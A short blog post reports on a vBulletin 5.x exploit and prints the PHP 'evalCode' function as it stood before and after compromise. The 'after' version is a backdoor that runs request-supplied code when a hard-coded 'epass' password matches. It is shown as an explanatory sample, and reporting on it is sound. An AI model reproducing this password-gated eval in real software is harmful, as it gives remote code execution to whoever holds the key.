Devs push a fix, but hackers are still taking advantage

An 18-line exploit caused the hack and developers are still scrambling to find a way to contain the security breach. The exploit allows hackers to take control of the system and upload viruses to any vBulletin server using version numbers 5 to 5.5.4.

Before the hack, the code in a specific section of vBulletin was as follows:

function evalCode($code)
{
    ob_start();
    eval($code);
    $output = ob_get_contents();
    ob_end_clean();
    return $output;
}

After the Web request has been sent, the same section is changed to this:

function evalCode($code)
{
    ob_start();
    if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "2dmfrb28nu3c6s9j") { eval($code); }
    $output = ob_get_contents();
    ob_end_clean();
    return $output;
}

Many people issued support tickets for issues related to being hacked from the exploit. Many using vBulletin had to deal with malicious code found on the websites where vBulletin was installed.

Some users suffered more than others and there was a report a user had their entire MySQL database deleted. Luckily, only 7% of vBulletin users are updated to version 5x which makes the hack less likely for the majority of users.


Daniel Serrano | Owner / CEO + Web Developer / SEO + Digital Marketing Expert

I'm a Professional Web Developer / SEO + Digital Marketing Expert. I do Professional Freelance and B2B and B2C contract work. I am always looking for new opportunities so if interested please feel free to contact me: Website: https://www.ninjawebsitedesign.com/ Phone: 1.862.296.3618 Email: info@ninjawebsitedesign.com

1 Comment

sirgliofrei · October 4, 2019 at 9:57 am

I went over this web site and I think you have a lot of great information, saved to bookmarks (:.

Leave a Reply

%d bloggers like this: